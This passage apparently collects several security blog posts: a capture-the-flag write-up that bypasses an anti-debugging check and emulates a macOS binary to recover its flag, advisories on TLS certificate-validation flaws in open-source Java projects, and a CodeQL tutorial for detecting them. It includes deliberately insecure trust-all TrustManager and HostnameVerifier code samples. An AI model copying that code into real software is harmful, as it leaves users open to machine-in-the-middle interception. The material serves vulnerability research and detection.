r12 0x0000000000000000 r13 0x0000000000000000 r14 0x0000000000000000
r15 0x0000000000000000 rip 0x00000000000017bd
rflags 0x0000000000000000 cs 0x0000000000000000 fs 0x0000000000000000
gs 0x0000000000000000
[...]
So 0x00000000000017bd is the entry point of the binary. However, I didn’t know at the time that the entry point is determined by LC_UNIXTHREAD.
So I tried to debug the binary with lldb:
$ lldb
(lldb) process launch --stop-at-entry -- command_injection
Process 5805 stopped
* thread #1, stop reason = signal SIGSTOP
frame #0: 0x00000000000017bd command_injection
-> 0x17bd: syscall
The binary stops at the entry point 🎉
However, it immediately exits when stepping over the syscall instruction.
Process 5805 exited with status = 45 (0x0000002d)
If we google for exited with status = 45 (0x0000002d) we find that this is an anti-debugging feature that is based on the ptrace system call 3.
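How does the initial rax value turn into a ptrace call? Assuming the standard XNU encoding (syscall class in the bits above 24, class 2 being the BSD/UNIX class), we can decode it:

```python
# rax as set by the LC_UNIXTHREAD initial register state
rax = 0x200001A

# Assumed XNU encoding: syscall class in bits 24+, number in the low 24 bits.
# Class 2 is the BSD/UNIX class, and BSD syscall 26 is ptrace.
syscall_class = rax >> 24
syscall_number = rax & 0xFFFFFF
print(syscall_class, syscall_number)
```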
We can easily bypass this by adjusting the entry point to the next instruction after the syscall instruction.
Now we can analyze the binary in lldb and all should be good, right?
Not really: tmate/tmux is painful to use, and I am not familiar with lldb and didn’t want to learn it right now.
Instead, I figured that just emulating the binary with Unicorn would be easier and give me more control and insight into the binary.
Unicorn is a lightweight multi-platform, multi-architecture CPU emulator framework. It is easy to use and has Python bindings, so we can write a script that emulates the binary and prints the instructions and register values.
However, we have to load the binary into memory and set up the initial register state ourselves, as we don’t have a loader that does this for us.
We set the entry point to 0x17bd + 2 because we want to skip the anti-debugging feature and the other registers to the values from the LC_UNIXTHREAD command.
Additionally, we have to set up the stack and the argv[0] variable.
The flag input is stored in argv[0], so we just let it point to an empty string.
Also, we add hooks for tracing all instructions and memory accesses, so we can see what the binary does as well as a hook for all cmp instructions.
The cmp instructions are used to check whether the flag is correct, by comparing the value in rax with the value in rdi.
The value in rax is the flag input XORed with rcx, so if we want to know the correct flag, we just have to XOR the value in rdi with the value in rcx.
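In other words, the recovery step boils down to a single XOR. A minimal sketch with made-up register values (the real key in rcx differs; only the recovered chunk brck{Y0U is taken from the actual run):

```python
import struct

# Hypothetical register values at the cmp: rcx holds the XOR key and rdi the
# expected (encoded) value; the binary compares rax = input ^ rcx against rdi.
rcx = 0x1122334455667788                           # made-up key
rdi = rcx ^ int.from_bytes(b"brck{Y0U", "little")  # encoded flag chunk

# Recover 8 flag bytes exactly as the hook does with p64(rdi ^ rcx)
chunk = struct.pack("<Q", rdi ^ rcx)
print(chunk)
```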
If we run the script once, we get the flag part brck{Y0U. If we add this to the flag input, and run the script again, we get the next part _M4cho_C. If we repeat this once more, we get the full flag:
brck{Y0U_M4cho_C0mm4ndr}
from unicorn import *
from unicorn.x86_const import *
from capstone import *
from capstone.x86 import *

# Initialize capstone disassembler
md = Cs(CS_ARCH_X86, CS_MODE_64)

from pwn import *

context.arch = "amd64"

# Memory address where emulation starts
ADDRESS = 0x1000
START_ADDRESS = 0x00000000000017BD + 2  # skip the ptrace anti-debugging syscall
STACK_START_ADDRESS = 0x7FFF_FF00_0000
STACK_SIZE = 1024 * 1024
STACK_END_ADDRESS = STACK_START_ADDRESS + STACK_SIZE
STACK_ADDRESS = STACK_START_ADDRESS + STACK_SIZE // 2

# Load binary
with open("command_injection_orig", "rb") as f:
    binary = f.read()

# Initialize emulator in X86-64 mode
mu = Uc(UC_ARCH_X86, UC_MODE_64)

# Map 2MB memory for this emulation
mu.mem_map(ADDRESS, 2 * 1024 * 1024)

# Write binary to memory
mu.mem_write(ADDRESS, binary)

# Map 1MB stack memory
mu.mem_map(STACK_START_ADDRESS, STACK_SIZE)

# Initialize stack pointer
mu.reg_write(UC_X86_REG_RSP, STACK_ADDRESS)

# Initialize argv[0]
argv0 = [b""]  # flag input
argv0.append(b"\x00")  # Null-terminate the argv[0] list

# Write argv[0] to memory
argv_address = STACK_END_ADDRESS - 128 * 8  # Allocate space for argv on the stack
mu.mem_write(argv_address, argv0[0])
mu.mem_write(argv_address + len(argv0[0]), b"\x00")
mu.mem_write(
    STACK_ADDRESS + 0x8, p64(argv_address)
)  # Write the address of argv[0] to the stack

# Initialize registers (values taken from the LC_UNIXTHREAD command)
mu.reg_write(UC_X86_REG_RAX, 0x000000000200001A)
mu.reg_write(UC_X86_REG_RBX, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RCX, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RDX, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RDI, 0x000000000000001F)
mu.reg_write(UC_X86_REG_RSI, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RBP, 0x0000000000000000)
# mu.reg_write(UC_X86_REG_RSP, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R8, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R9, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R10, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R11, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R12, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R13, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R14, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R15, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RIP, START_ADDRESS)


# Tracing all instructions with customized callback
def hook_code(uc, address, size, user_data):
    print(">>>")
    instruction = mu.mem_read(address, size)
    dis = disasm(instruction, vma=address)
    print(f"{address:#x}: {dis}")
    r10 = mu.reg_read(UC_X86_REG_R10)
    rsp = mu.reg_read(UC_X86_REG_RSP)
    rax = mu.reg_read(UC_X86_REG_RAX)
    rcx = mu.reg_read(UC_X86_REG_RCX)
    rdi = mu.reg_read(UC_X86_REG_RDI)
    print(f"r10: {r10:#x}, rsp: {rsp:#x}, rax: {rax:#x}, rcx: {rcx:#x}, rdi: {rdi:#x}")
    if address == 0x19BE:
        print(">>> Stopping emulation")
        mu.emu_stop()
    if "cmp" in dis and rax != rdi:
        print(">>> Stopping emulation")
        print(p64(rdi ^ rcx))  # recover the next 8 flag bytes
        mu.emu_stop()


mu.hook_add(UC_HOOK_CODE, hook_code)


# Tracing all memory READ & WRITE
def hook_mem_access(uc, access, address, size, value, user_data):
    if access == UC_MEM_WRITE:
        print(
            f">>> Memory is being WRITTEN at {address:#x}, data size = {size}, data value = {value:#x} ({p64(value)})"
        )
    else:  # READ
        print(
            f">>> Memory is being READ at {address:#x}, data size = {size}, data value = {mu.mem_read(address, size)}"
        )


mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access)

# Emulate code in infinite time & unlimited instructions
mu.emu_start(START_ADDRESS, ADDRESS + len(binary))
See this Stack Overflow answer for more information. ↩
Newer binaries use the LC_MAIN load command, which is not present in this binary. ↩
ptrace is called because rax is set to 0x1a in the initial register state. ↩
The HttpUtils#getURLConnection function of apache/calcite disabled hostname verification and used an insecure TrustManager for HTTPS connections, making clients vulnerable to a machine-in-the-middle attack (MiTM).
Commit ab19f981
The HttpUtils#getURLConnection method disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The method also uses an insecure TrustManager that trusts all certificates, even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection, even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-005 in any communication regarding this issue.
apache/fineract disabled hostname verification and used an insecure TrustManager for HTTPS connections, making clients vulnerable to a machine-in-the-middle attack (MiTM).
Commit d83bdc41
The ProcessorHelper#configureClient method disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The method also uses an insecure TrustManager that trusts all certificates, even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection, even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-006 in any communication regarding this issue.
opencast/opencast disabled hostname verification and used an insecure TrustManager for HTTPS connections, making clients vulnerable to a machine-in-the-middle attack (MiTM).
Commit 4b905437
The HttpClientImpl class disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The class also uses an insecure TrustManager that trusts all certificates, even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection, even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-007 in any communication regarding this issue.
openMF/mifos-mobile disabled hostname verification and used an insecure TrustManager for HTTPS connections, making clients vulnerable to a machine-in-the-middle attack (MiTM).
Commit 7ed4f22f
The SelfServiceOkHttpClient class disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The class also uses an insecure TrustManager that trusts all certificates, even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection, even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-008 in any communication regarding this issue.
ballerina-platform/ballerina-lang used an insecure TrustManager for HTTPS connections, making clients vulnerable to a machine-in-the-middle attack (MiTM) and remote code execution (RCE).
ballerina-platform/ballerina-lang
Commit 9a4d1967
The Ballerina programming language provides the bal tool for managing everything related to Ballerina.
Dependency management is done using the bal pull/push/search commands, which allow downloading and uploading packages from the central repository, or searching for a package.
I’m focusing on the bal pull command; the other sub-commands have the same problem and a similar execution flow.
The bal pull command is internally represented by the PullCommand class which will delegate the actual work to the CentralAPIClient#pullPackage method.
The pullPackage method then calls the Utils#initializeSsl method, which claims to “initialize SSL” but actually enables an insecure TrustManager (defined here).
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
After an attacker has forged such a certificate they can intercept and manipulate the requested package and include arbitrary code! Because the issue affects both downloading and uploading of packages this could also be used for a supply-chain attack.
Machine-in-the-middle attack. Remote code execution. Supply chain attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2021-001 in any communication regarding this issue.
In this post, I want to show how I found five vulnerabilities in usage of the Java TrustManager and HostnameVerifier classes.
I start with a short section about what a certificate is and what CodeQL is, and finally I explain the query I used to find the vulnerabilities.
A certificate associates an identity (hostname, personal identity, …) with a public key and can either be signed by a Certificate Authority (CA) or be self-signed. A CA is a trusted third party that verifies the identity of the owner of the certificate and signs the certificate with their own private key. Both browsers and operating systems come with a set of CAs that they trust by default 1.
When a client connects to a server using TLS, the server sends its certificate to the client. The client then verifies the certificate by checking whether it is signed by a trusted CA and whether the hostname of the server matches the hostname in the certificate. If the certificate is valid, the client will establish a secure and encrypted connection with the server.
The problem is that the client can be configured to trust certificates that are not signed by a trusted CA or that don’t match the hostname of the server. This is usually done for testing purposes, but it can also be done by mistake or just as an oversight.
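For comparison outside the Java world, Python’s ssl module exposes the same two knobs: a default context verifies both the certificate chain and the hostname, and an “insecure” context disables exactly the checks the queries below look for (a sketch, not tied to any of the reported projects):

```python
import ssl

# A default client context verifies both the certificate chain and the hostname.
ctx = ssl.create_default_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED, ctx.check_hostname)

# The equivalent of an insecure TrustManager plus an all-accepting
# HostnameVerifier: accept any hostname, trust any chain.
insecure = ssl.create_default_context()
insecure.check_hostname = False       # like HostnameVerifier#verify returning true
insecure.verify_mode = ssl.CERT_NONE  # like an empty checkServerTrusted
```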
Browsers usually get this right, but there have also been cases in the past where they incorrectly implemented hostname verification 2 3 or where they had other problems verifying a certificate 4.
In this post I’m going to focus on Java applications that use the TrustManager or HostnameVerifier classes unsafely.
CodeQL is a static analysis tool developed by Semmle, now part of GitHub.
It can be used both for (targeted) variant analysis and also (less targeted) analysis of entire bug classes like XSS, SSRF, and many more.
CodeQL has a simple but powerful logical query language. If you want to learn more about CodeQL I recommend reading the CodeQL documentation.
So what is an insecure TrustManager?
A TrustManager is insecure if it accepts all certificates, regardless of whether they are signed by a trusted CA or not.
This is usually done by implementing the checkServerTrusted method of the X509TrustManager interface and never throwing an exception – therefore accepting all certificates.
In code this would look like this:
class InsecureTrustManager implements X509TrustManager {
    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return null;
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        // BAD: Does not verify the certificate chain, allowing any certificate.
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
    }
}
If we then use this TrustManager like so in our application:
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, new TrustManager[] { new InsecureTrustManager() }, null);
HttpsURLConnection connection = (HttpsURLConnection) new URL("https://untrusted-root.badssl.com/").openConnection();
connection.setSSLSocketFactory(sslContext.getSocketFactory());
connection.connect();
We will happily connect to the server even though the certificate is not signed by a trusted CA.
When writing a query it’s very helpful to verbalize the query:
We want to find all cases where an insecure TrustManager is used to initialize an SSLContext.
This means that we have a data flow query and we “just” have to define the source and the sink!
We can directly translate this into a CodeQL from clause:
from InsecureTrustManagerFlow::PathNode source, InsecureTrustManagerFlow::PathNode sink
Sources are all TrustManager instances that are insecure, and sinks are all SSLContext instances that are initialized with an insecure TrustManager!
Our where clause then only has to ensure that the source is actually used at the sink, that is, we need flowPath to hold:
where InsecureTrustManagerFlow::flowPath(source, sink)
The select clause then adds a message at the location of the SSLContext#init method and also references where the trust manager has been defined:
select sink, source, sink, "This uses $@, which is defined in $@ and trusts any certificate.",
source, "TrustManager",
source.getNode().asExpr().(ClassInstanceExpr).getConstructedType() as type, type.nestedName()
The rest of the query contains a little bit of boilerplate to make the query better structured and reusable.
(The main query can be found here, support files are in InsecureTrustManager.qll and InsecureTrustManagerQuery.qll).
(Some parts of the query are shown simplified)
The InsecureTrustManagerSource class models all TrustManager instances that are insecure on the data flow level 5 by viewing the node as an expression and then checking whether its constructed type 6 is an InsecureX509TrustManager.
private class InsecureTrustManagerSource extends DataFlow::Node {
  InsecureTrustManagerSource() {
    this.asExpr().(ClassInstanceExpr).getConstructedType() instanceof InsecureX509TrustManager
  }
}
InsecureX509TrustManager is a class that models all classes deriving from X509TrustManager (#1) that have overridden the “checkServerTrusted” method (#2) and that never throw a CertificateException (#3).
private class InsecureX509TrustManager extends RefType {
  InsecureX509TrustManager() {
    this.getAnAncestor() instanceof X509TrustManager and // #1
    exists(Method m |
      m.getDeclaringType() = this and
      m.hasName("checkServerTrusted") and // #2
      not mayThrowCertificateException(m) // #3
    )
  }
}
Under what conditions can a method throw a CertificateException?
When it contains a throw statement that throws a CertificateException (#4) or when it calls a method (#5) that may throw a CertificateException (#6) or if there is no source code available for the called method and the method has a @throws annotation that mentions CertificateException (#7).
private predicate mayThrowCertificateException(Method m) {
  exists(ThrowStmt throwStmt | // #4
    throwStmt.getThrownExceptionType().getAnAncestor() instanceof CertificateException // #4
  |
    throwStmt.getEnclosingCallable() = m // #4
  )
  or
  exists(Method otherMethod | m.polyCalls(otherMethod) | // #5
    mayThrowCertificateException(otherMethod) // #6
    or
    not otherMethod.fromSource() and // #7
    otherMethod.getAnException().getType().getAnAncestor() instanceof CertificateException // #7
  )
}
The InsecureTrustManagerSink class models all cases where any TrustManager (#8) is used to init (#9) an SslContext (#10).
private class InsecureTrustManagerSink extends DataFlow::Node {
  InsecureTrustManagerSink() {
    exists(MethodCall ma, Method m |
      m.hasName("init") and // #9
      m.getDeclaringType() instanceof SslContext and // #10
      ma.getMethod() = m
    |
      ma.getArgument(1) = this.asExpr() // #8
    )
  }
}
The InsecureTrustManagerConfig module then simply combines the source (#11) and the sink (#12) like this:
module InsecureTrustManagerConfig implements DataFlow::ConfigSig {
predicate isSource(DataFlow::Node source) { source instanceof InsecureTrustManagerSource } // #11
predicate isSink(DataFlow::Node sink) { sink instanceof InsecureTrustManagerSink } // #12
}
However, we have a slight problem: remember that we have a data flow query and not a taint tracking query. Recall the example from above:
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null,
    new TrustManager[] { // #14
        new InsecureTrustManager() // #13 #14
    } // #14
    , null);
We want to find flow from #13 to the second (1 in the definition of InsecureTrustManagerSink, because CodeQL is zero-based) argument of init.
However, #13 is an array element and cannot flow to the array itself (#14) (CodeQL distinguishes between the array elements and the array itself). To fix this, we can allow implicit reads of array elements by overriding the allowImplicitRead predicate.
predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
  (isSink(node) or isAdditionalFlowStep(node, _)) and
  node.getType() instanceof Array and
  c instanceof DataFlow::ArrayContent
}
This predicate allows implicit reads of array elements when the array is used as a sink or when it is used as an additional flow step. By enabling implicit reads, CodeQL will not distinguish between data stored inside something (in a field, in an array as an element, in a map as a key or value, …) and the thing itself (the object the field belongs to, the array where the element is in, the map where the key/value is from, …) 7.
So what is disabled hostname verification?
Hostname verification is disabled if we have a HostnameVerifier that always returns true in its verify method.
Always returning true means that we will accept any hostname, regardless of whether it matches the hostname in the certificate or not!
In code this would look like this:
HostnameVerifier verifier = new HostnameVerifier() {
    @Override
    public boolean verify(String hostname, SSLSession session) {
        return true; // BAD: accept even if the hostname doesn't match
    }
};
If we then use this HostnameVerifier like so in our application:
HttpsURLConnection connection = (HttpsURLConnection) new URL("https://wrong.host.badssl.com/").openConnection();
connection.setHostnameVerifier(verifier);
connection.connect();
We will happily connect to the server even though the certificate is not valid for the wrong.host.badssl.com domain 8.
Again, when writing a query it’s very helpful to verbalize the query:
We want to find all cases where an all-accepting HostnameVerifier is used in a HttpsURLConnection#set(Default)HostnameVerifier call.
This means that we again have a data flow query and we “just” have to define the source and the sink!
We can directly translate this into a CodeQL from clause:
from
TrustAllHostnameVerifierFlow::PathNode source, TrustAllHostnameVerifierFlow::PathNode sink
Sources are all HostnameVerifier instances that are all-accepting, and sinks are all HttpsURLConnection#set(Default)HostnameVerifier calls!
Our where clause then only has to ensure that the source is actually used at the sink, that is, we need flowPath to hold:
where TrustAllHostnameVerifierFlow::flowPath(source, sink)
The select clause then adds a message at the location of the HttpsURLConnection#set(Default)HostnameVerifier method and also references where the all-accepting hostname verifier has been defined:
select sink, source, sink,
"The $@ defined by $@ always accepts any certificate, even if the hostname does not match.",
source, "hostname verifier", source.getNode().asExpr().(ClassInstanceExpr).getConstructedType() as verifier, "this type"
The rest of the query contains a little bit of boilerplate to make the query better structured and reusable.
(The main query can be found here, support files are in UnsafeHostnameVerificationQuery.qll).
(Some parts of the query are shown simplified)
The TrustAllHostnameVerifier class models all HostnameVerifier instances that accept any hostname by checking whether the instance derives from HostnameVerifier (#1) and if it overrides the verify method (#2) to always return true (#3).
class TrustAllHostnameVerifier extends RefType {
  TrustAllHostnameVerifier() {
    this.getAnAncestor() instanceof HostnameVerifier and // #1
    exists(HostnameVerifierVerify m |
      m.getDeclaringType() = this and // #2
      alwaysReturnsTrue(m) // #3
    )
  }
}
When does a method always return true?
When all return statements return true (#4). Note that this is a simplification; there could be methods that always return true in practice/at runtime, but we cannot determine this statically.
private predicate alwaysReturnsTrue(HostnameVerifierVerify m) {
  forex(ReturnStmt rs | rs.getEnclosingCallable() = m |
    rs.getResult().(CompileTimeConstantExpr).getBooleanValue() = true // #4
  )
}
The HostnameVerifierSink class models all cases where any HostnameVerifier is used in e.g. a HttpsURLConnection#setHostnameVerifier call.
private class HostnameVerifierSink extends DataFlow::Node {
  HostnameVerifierSink() { sinkNode(this, "hostname-verification") }
}
It does this by using the special sinkNode predicate that gets all nodes that are annotated with hostname-verification in a “Models-as-Data” (MaD) file.
The MaD files can be found in .yml files in the java/ql/lib/ext folder.
In our case, there are three definitions:
- ["javax.net.ssl", "HttpsURLConnection", True, "setDefaultHostnameVerifier", "", "", "Argument[0]", "hostname-verification", "manual"]
- ["javax.net.ssl", "HttpsURLConnection", True, "setHostnameVerifier", "", "", "Argument[0]", "hostname-verification", "manual"]
# from https://github.com/github/codeql/blob/257fe1ad6b5e8e596ece2306213dcfc340420e2c/java/ql/lib/ext/javax.net.ssl.model.yml#L6-L7
- ["org.apache.cxf.configuration.jsse", "TLSClientParameters", True, "setHostnameVerifier", "(HostnameVerifier)", "", "Argument[0]", "hostname-verification", "manual"]
# from https://github.com/github/codeql/blob/257fe1ad6b5e8e596ece2306213dcfc340420e2c/java/ql/lib/ext/org.apache.cxf.configuration.jsse.model.yml#L7
The first element is the package name ("javax.net.ssl"), the second element is the class name ("HttpsURLConnection").
The third element is a boolean that indicates whether to jump to an arbitrary subtype of that type (True), the fourth element is the method name ("setDefaultHostnameVerifier") although generally this just selects a specific member (method, field, …) of the type.
The fifth element allows restriction based on the member signature ("" so no filtering is done), the sixth element is not relevant in our case.
The seventh element defines how data enters the sink ("Argument[0]" in our case), the eighth element is the annotation that is used to annotate the sink ("hostname-verification").
The ninth element is the origin of the model (in this case manual because the model has been added manually and not generated by e.g. the model generator). For more information about MaD files have a look at this internal documentation.
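To keep the nine positions straight, here is a small sketch that pairs the example row with the usual column names (the label strings below are my own shorthand, not CodeQL identifiers):

```python
# Shorthand labels for the nine MaD sink-row positions described above.
COLUMNS = [
    "package", "type", "subtypes", "name", "signature",
    "ext", "input", "kind", "provenance",
]

row = ["javax.net.ssl", "HttpsURLConnection", True,
       "setHostnameVerifier", "", "", "Argument[0]",
       "hostname-verification", "manual"]

model = dict(zip(COLUMNS, row))
print(model["kind"])   # which sink annotation this row defines
print(model["input"])  # how data enters the sink
```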
The TrustAllHostnameVerifierConfig module then simply combines the source (#5) and the sink (#6) like this:
module TrustAllHostnameVerifierConfig implements DataFlow::ConfigSig {
  predicate isSource(DataFlow::Node source) {
    source.asExpr().(ClassInstanceExpr).getConstructedType() instanceof TrustAllHostnameVerifier // #5
  }

  predicate isSink(DataFlow::Node sink) { sink instanceof HostnameVerifierSink } // #6
}
Because we want to reduce false positives, we add an isBarrier predicate to the query.
This predicate ignores all nodes that are in functions that suggest that they intentionally disable hostname verification.
predicate isBarrier(DataFlow::Node barrier) {
  // ignore nodes that are in functions that intentionally disable hostname verification
  barrier
      .getEnclosingCallable()
      .getName()
      /*
       * Regex: (_)* :
       * some methods have underscores.
       * Regex: (no|ignore|disable)(strictssl|ssl|verify|verification|hostname)
       * noStrictSSL ignoreSsl
       * Regex: (set)?(accept|trust|ignore|allow)(all|every|any)
       * acceptAll trustAll ignoreAll setTrustAnyHttps
       * Regex: (use|do|enable)insecure
       * useInsecureSSL
       * Regex: (set|do|use)?no.*(check|validation|verify|verification)
       * setNoCertificateCheck
       * Regex: disable
       * disableChecks
       */
      .regexpMatch("^(?i)(_)*((no|ignore|disable)(strictssl|ssl|verify|verification|hostname)" +
          "|(set)?(accept|trust|ignore|allow)(all|every|any)" +
          "|(use|do|enable)insecure|(set|do|use)?no.*(check|validation|verify|verification)|disable).*$")
}
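We can sanity-check this regex outside CodeQL; the sketch below replays it in Python (with the inline (?i) replaced by re.IGNORECASE, since recent Python versions reject global flags that are not at the start of the pattern):

```python
import re

# The barrier regex from the query, minus the inline (?i) flag.
BARRIER = re.compile(
    "^(_)*((no|ignore|disable)(strictssl|ssl|verify|verification|hostname)"
    "|(set)?(accept|trust|ignore|allow)(all|every|any)"
    "|(use|do|enable)insecure"
    "|(set|do|use)?no.*(check|validation|verify|verification)"
    "|disable).*$",
    re.IGNORECASE,
)

# Method names like these should be treated as barriers...
for name in ["noStrictSSL", "trustAllCerts", "useInsecureSSL",
             "setNoCertificateCheck", "disableChecks"]:
    print(name, bool(BARRIER.match(name)))

# ...while an ordinary method name should not match.
print(bool(BARRIER.match("connect")))
```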
To further reduce false positives, we also extend the where clause with and not isNodeGuardedByFlag(sink.getNode()) to remove all sinks that are guarded by a flag indicating intentional disabling of hostname verification.
predicate isNodeGuardedByFlag(DataFlow::Node node) {
  exists(Guard g | g.controls(node.asExpr().getBasicBlock(), _) | // #7
    g = getASecurityFeatureFlagGuard() or g = getAnUnsafeHostnameVerifierFlagGuard() // #8
  )
}
A node is guarded when there is a Guard that controls (#7) 9 the node and that is either a security feature flag guard or an unsafe hostname verifier flag guard (#8).
A Guard controls another node when the execution of the controlled node is dependent on the condition specified by the guard.
For example, consider the following code:
if (isHostnameVerificationDisabled()) { // #9
connection.setHostnameVerifier(new TrustAllHostnameVerifier()); // #10
}
Here, the connection.setHostnameVerifier (#10) call is guarded/controlled by the isHostnameVerificationDisabled (#9) method call.
The getASecurityFeatureFlagGuard predicate gets some pre-defined guards indicating intentional disabling of a security feature while the getAnUnsafeHostnameVerifierFlagGuard predicate gets guards specific to hostname verification. For that reason, we extend the existing FlagKind class.
All we have to do is to override the getAFlagName predicate to get all strings that should be considered a flag.
private class UnsafeHostnameVerificationFlag extends FlagKind {
  UnsafeHostnameVerificationFlag() { this = "UnsafeHostnameVerificationFlag" }

  bindingset[result]
  override string getAFlagName() {
    result
        .regexpMatch("(?i).*(secure|disable|selfCert|selfSign|validat|verif|trust|ignore|nocertificatecheck).*") and
    result != "equalsIgnoreCase"
  }
}
By extending the FlagKind class, we get all the functionality of the FlagKind class for free! Namely, we get the getAFlag predicate that gets all flags that are used to guard a node.
private Guard getAnUnsafeHostnameVerifierFlagGuard() {
  result = any(UnsafeHostnameVerificationFlag flag).getAFlag().asExpr()
}
This completes the implementation of isNodeGuardedByFlag and allows us to heavily reduce false positives!
In this post I showed how to find multiple CVEs in the usage of the Java TrustManager and HostnameVerifier classes using CodeQL.
I did this by using a data flow query that finds all cases where an insecure TrustManager or an all-accepting HostnameVerifier is used.
Many – if not most – problems can be viewed as data flow/taint tracking problems and CodeQL is a great tool to solve these problems!
These CAs can and will be removed when there are problems with them, see e.g. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/oxX69KFvsm4, https://wiki.mozilla.org/CA/Symantec_Issues, or https://www.techtarget.com/searchsecurity/news/252527914/Mozilla-Microsoft-drop-Trustcor-as-root-certificate-authority. ↩
There are multiple “levels” in CodeQL. The data flow level is the highest level and is partially shared across all languages supported by CodeQL while the abstract syntax tree level is specific to each language and is the lowest level. ↩
A ClassInstanceExpr is for example new FooBar() and getConstructedType gets the type of the constructed object, in this case FooBar. ↩
For more information about implicit reads see this discussion. ↩
The certificate is only valid for *.badssl.com and badssl.com. Wildcard certificates – like *.badssl.com – only apply to one level of subdomains, so wrong.host.badssl.com is not covered by the certificate, but host.badssl.com or foobar.badssl.com would be. ↩
Technically, the Guard verifies that it controls the basic block that contains the node. ↩